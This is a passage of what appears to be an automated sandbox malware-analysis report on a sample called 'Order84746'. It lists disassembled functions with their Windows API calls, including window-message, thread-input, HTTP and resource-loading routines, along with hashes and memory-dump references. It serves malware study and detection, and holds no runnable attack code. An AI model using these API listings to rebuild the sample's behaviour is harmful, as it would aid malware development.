                          • Opcode Fuzzy Hash: 50d4afaf4b199ff25c68bb8aaae7e19fe01b57b232bfe4fb8dd5d046a0151926
                          • Instruction Fuzzy Hash: E831A435A002199FDB01EF68EC85EBEB7B8FF59304F148415E915EB2A5DB70AA02C751
                          Function 0091B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0091B98C
                          • GetDlgCtrlID.USER32 ref: 0091B997
                          • GetParent.USER32 ref: 0091B9B3
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0091B9B6
                          • GetDlgCtrlID.USER32(?), ref: 0091B9BF
                          • GetParent.USER32(?), ref: 0091B9DB
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0091B9DE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent
                          • String ID: ComboBox$ListBox
                          • API String ID: 1383977212-1403004172
                          • Opcode ID: 9784a8223fc66c175a669ec0dc74de2d668dcaffc6da2a09bba82867831cab04
                          • Instruction ID: 7f436904d9d5b249ae69a405d5555254d1d83cbec74afc8b8cbd27e6608cfdc3
                          • Opcode Fuzzy Hash: 9784a8223fc66c175a669ec0dc74de2d668dcaffc6da2a09bba82867831cab04
                          • Instruction Fuzzy Hash: AD21C475E00108BFCF04ABA5CC85EFEB779EB46314B100119F561972E1DBB958569B20
                          Function 0091B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0091BA73
                          • GetDlgCtrlID.USER32 ref: 0091BA7E
                          • GetParent.USER32 ref: 0091BA9A
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0091BA9D
                          • GetDlgCtrlID.USER32(?), ref: 0091BAA6
                          • GetParent.USER32(?), ref: 0091BAC2
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0091BAC5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent
                          • String ID: ComboBox$ListBox
                          • API String ID: 1383977212-1403004172
                          • Opcode ID: 3a60be1e6436aa9e2b2043efa092f85f7c2c2d513c15a4747f28221a10d69db3
                          • Instruction ID: b292880de5f545fcaf9c2a600687fb080e54c3a1a55a503357e9acb71db93e6a
                          • Opcode Fuzzy Hash: 3a60be1e6436aa9e2b2043efa092f85f7c2c2d513c15a4747f28221a10d69db3
                          • Instruction Fuzzy Hash: 1921B375F01148BFDF00AB65CC85EFEB7BAEF45300F100019F561931A1DBB95956AB21
                          Function 0091BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 0091BAE3
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 0091BAF8
                          • _wcscmp.LIBCMT ref: 0091BB0A
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0091BB85
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: 5e84f1a61093a74b6fe2504e817a9cbbdc088a4befe30f5e3904715a6e321bef
                          • Instruction ID: ad31a84e9837dcb77be5691e3e6cfc0bd7ffe6dc6c08723032069b6ef90c8b85
                          • Opcode Fuzzy Hash: 5e84f1a61093a74b6fe2504e817a9cbbdc088a4befe30f5e3904715a6e321bef
                          • Instruction Fuzzy Hash: 1E1136B778C30BFEFA207724DC06EE6379E9B91324F200026FA04E44E5EBA5A8906514
                          Function 0093B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0093B2D5
                          • CoInitialize.OLE32(00000000), ref: 0093B302
                          • CoUninitialize.COMBASE ref: 0093B30C
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 0093B40C
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 0093B539
                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0093B56D
                          • CoGetObject.OLE32(?,00000000,0096D91C,?), ref: 0093B590
                          • SetErrorMode.KERNEL32(00000000), ref: 0093B5A3
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0093B623
                          • VariantClear.OLEAUT32(0096D91C), ref: 0093B633
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0
                          • Opcode ID: b87aa832a941622b91814457869ff94e7287a1a3a17698882ec6be6fb68b2c72
                          • Instruction ID: 0bd55af26d5074dc99fc022912492fd9c4f282c3dc7340a1199780ba1df5da83
                          • Opcode Fuzzy Hash: b87aa832a941622b91814457869ff94e7287a1a3a17698882ec6be6fb68b2c72
                          • Instruction Fuzzy Hash: E8C11271608305AFC700DF69C885A6AB7E9FF89308F04491DF69ADB261DB71ED05CB52
                          Function 0090ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 0090ACC1
                            • Part of subcall function 00907CF4: __mtinitlocknum.LIBCMT ref: 00907D06
                            • Part of subcall function 00907CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00907D1F
                          • __calloc_crt.LIBCMT ref: 0090ACD2
                            • Part of subcall function 00906986: __calloc_impl.LIBCMT ref: 00906995
                            • Part of subcall function 00906986: Sleep.KERNEL32(00000000,000003BC,008FF507,?,0000000E), ref: 009069AC
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0090ACED
                          • GetStartupInfoW.KERNEL32(?,00996E28,00000064,00905E91,00996C70,00000014), ref: 0090AD46
                          • __calloc_crt.LIBCMT ref: 0090AD91
                          • GetFileType.KERNEL32(00000001), ref: 0090ADD8
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0090AE11
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 1426640281-0
                          • Opcode ID: 730f19e3d2dc023e900a943095a0afb5303ff8d56aae1362ab741b8c32626516
                          • Instruction ID: 30826d4b97ff68e846887989eee849d24ff7ec48b66c014b476cce69aa137895
                          • Opcode Fuzzy Hash: 730f19e3d2dc023e900a943095a0afb5303ff8d56aae1362ab741b8c32626516
                          • Instruction Fuzzy Hash: C081E3719153468FDB14CF68C8806AEBBF4AF8A324B24465DD4A6AB3D1C7349803DBD6
                          Function 009267E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                          Download Yara Rule
                          APIs
                          • __swprintf.LIBCMT ref: 009267FD
                          • __swprintf.LIBCMT ref: 0092680A
                            • Part of subcall function 0090172B: __woutput_l.LIBCMT ref: 00901784
                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 00926834
                          • LoadResource.KERNEL32(?,00000000), ref: 00926840
                          • LockResource.KERNEL32(00000000), ref: 0092684D
                          • FindResourceW.KERNEL32(?,?,00000003), ref: 0092686D
                          • LoadResource.KERNEL32(?,00000000), ref: 0092687F
                          • SizeofResource.KERNEL32(?,00000000), ref: 0092688E
                          • LockResource.KERNEL32(?), ref: 0092689A
                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 009268F9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                          • String ID:
                          • API String ID: 1433390588-0
                          • Opcode ID: d9d5cbc75810454d1548b87d98b9584fb85e1b7606704cdfbe58597c93c27290
                          • Instruction ID: 32071598b0d74f911e5304f7dabbae6553a1a798fe7f0b49c4595648292e001c
                          • Opcode Fuzzy Hash: d9d5cbc75810454d1548b87d98b9584fb85e1b7606704cdfbe58597c93c27290
                          • Instruction Fuzzy Hash: C0319EB1A0522AAFDB109F60ED55ABF7BACFF09340F008429F922D2150E774D951EBA0
                          Function 00924025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00924047
                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009230A5,?,00000001), ref: 0092405B
                          • GetWindowThreadProcessId.USER32(00000000), ref: 00924062
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 00924071
                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00924083
                          • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 0092409C
                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009230A5,?,00000001), ref: 009240AE
                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 009240F3
                          • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 00924108
                          • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009230A5,?,00000001), ref: 00924113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                          • String ID:
                          • API String ID: 2156557900-0
                          • Opcode ID: 98700afa360589b0dc03be34d0e147c0c39f4c9fdfed42a84ad6861d8e4bfa2b
                          • Instruction ID: 3bf46c73f5b0911fe6b653e97b6c96f163673b7dc5ff2669ac8515113c693ced
                          • Opcode Fuzzy Hash: 98700afa360589b0dc03be34d0e147c0c39f4c9fdfed42a84ad6861d8e4bfa2b
                          • Instruction Fuzzy Hash: 66319171A19224BFDB10DF54EC85B7977BDAF65321F10C019FD05E6294CBB49D809BA0
                          Function 0091CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                          Download Yara Rule
                          APIs
                          • EnumChildWindows.USER32(?,0091CF50), ref: 0091CE90
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ChildEnumWindows
                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                          • API String ID: 3555792229-1603158881
                          • Opcode ID: c342e595fc13799a594f23fdd074b0000642c760f65c9cb18092cf3218a4d68b
                          • Instruction ID: 9853d8a1c2a06c58880aafabf2b0a5b234c28413c25948efa83395a869729430
                          • Opcode Fuzzy Hash: c342e595fc13799a594f23fdd074b0000642c760f65c9cb18092cf3218a4d68b
                          • Instruction Fuzzy Hash: A6919170B4060AAACB18DF64C481BEAFBB9FF05340F508529E559E7191DF306D9ACBE0
                          Function 008E3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                          Download Yara Rule
                          APIs
                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E30DC
                          • CoUninitialize.COMBASE ref: 008E3181
                          • UnregisterHotKey.USER32(?), ref: 008E32A9
                          • DestroyWindow.USER32(?), ref: 00955079
                          • FreeLibrary.KERNEL32(?), ref: 009550F8
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00955125
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                          • String ID: close all
                          • API String ID: 469580280-3243417748
                          • Opcode ID: f5ec9e3ed740a007ebce75b618cfe2d61ef8ef8e662e9ec1e495e2a69fb7903b
                          • Instruction ID: e6611bf2cad3c93ba0809da2622681ba2af035e77a79dc46b0dbd53aea68ac63
                          • Opcode Fuzzy Hash: f5ec9e3ed740a007ebce75b618cfe2d61ef8ef8e662e9ec1e495e2a69fb7903b
                          • Instruction Fuzzy Hash: 1C915030700586CFC715EF2AC899B68F3A4FF16305F5541ADE50AA7262DB30AE1ACF55
                          Function 008FCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                          Download Yara Rule
                          APIs
                          • SetWindowLongW.USER32(?,000000EB), ref: 008FCC15
                            • Part of subcall function 008FCCCD: GetClientRect.USER32(?,?), ref: 008FCCF6
                            • Part of subcall function 008FCCCD: GetWindowRect.USER32(?,?), ref: 008FCD37
                            • Part of subcall function 008FCCCD: ScreenToClient.USER32(?,?), ref: 008FCD5F
                          • GetDC.USER32 ref: 0095D137
                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0095D14A
                          • SelectObject.GDI32(00000000,00000000), ref: 0095D158
                          • SelectObject.GDI32(00000000,00000000), ref: 0095D16D
                          • ReleaseDC.USER32(?,00000000), ref: 0095D175
                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0095D200
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                          • String ID: U
                          • API String ID: 4009187628-3372436214
                          • Opcode ID: 3a7865058c63863771cdb61ffc005ca028334e710cbdccea9cb4be53645d48d3
                          • Instruction ID: 698e4d3490784ab65473f8591e94ae7bec24d442b2c2ec35f80bd3aee3adf23b
                          • Opcode Fuzzy Hash: 3a7865058c63863771cdb61ffc005ca028334e710cbdccea9cb4be53645d48d3
                          • Instruction Fuzzy Hash: 65711030505209DFCF35DF65C880ABA7BB9FF49326F144229EE659A2A6C7308845DFA0
                          Function 00949A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00949B19
                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00949B2D
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00949B47
                          • _wcscat.LIBCMT ref: 00949BA2
                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00949BB9
                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00949BE7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend$Window_wcscat
                          • String ID: -----$SysListView32
                          • API String ID: 307300125-3975388722
                          • Opcode ID: 27b25c90fafcb862c64a98b9d14d895a5b0cfb61a32d1b0f3315621da7336414
                          • Instruction ID: 41177294d52b70bb2691db708307c02ca87ac228af4e138e6718a6b5df940cad
                          • Opcode Fuzzy Hash: 27b25c90fafcb862c64a98b9d14d895a5b0cfb61a32d1b0f3315621da7336414
                          • Instruction Fuzzy Hash: 50418F71A40308AFEB219FA4DC85FEB77A8EF48354F10442AF589E7291D6B19D84CB60
                          Function 009345C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009345FF
                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0093462B
                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0093466D
                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00934682
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0093468F
                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009346BF
                          • InternetCloseHandle.WININET(00000000), ref: 00934706
                            • Part of subcall function 00935052: GetLastError.KERNEL32(?,?,009343CC,00000000,00000000,00000001), ref: 00935067
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                          • String ID:
                          • API String ID: 1241431887-3916222277
                          • Opcode ID: 54c564a3adac1d7dce54a5d87a02cd5820a0da70fba0bbe847d550b75fe539fb
                          • Instruction ID: 8345051b8993cc74963099be403b275a6a9df26ab0d54188322e754dd2907b4e
                          • Opcode Fuzzy Hash: 54c564a3adac1d7dce54a5d87a02cd5820a0da70fba0bbe847d550b75fe539fb
                          • Instruction Fuzzy Hash: 824180B1A05605BFEB159F50CC86FBB77ACFF09308F01402AFA159A141D7B4AD449FA5
                          Function 0093B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                          Download Yara Rule
                          APIs
                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0097DC00), ref: 0093B715
                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0097DC00), ref: 0093B749
                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0093B8C1
                          • SysFreeString.OLEAUT32(?), ref: 0093B8EB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                          • String ID:
                          • API String ID: 560350794-0
                          • Opcode ID: 95b321a317bb2ed6b5ce9cbcba668da398c21475d8905b0f5c4e2c5bf615b40e
                          • Instruction ID: 72dfab9343a7c29ee5fdb1657e9661fe8d5a0aa690fa7e10d531a0dbaab34bbe
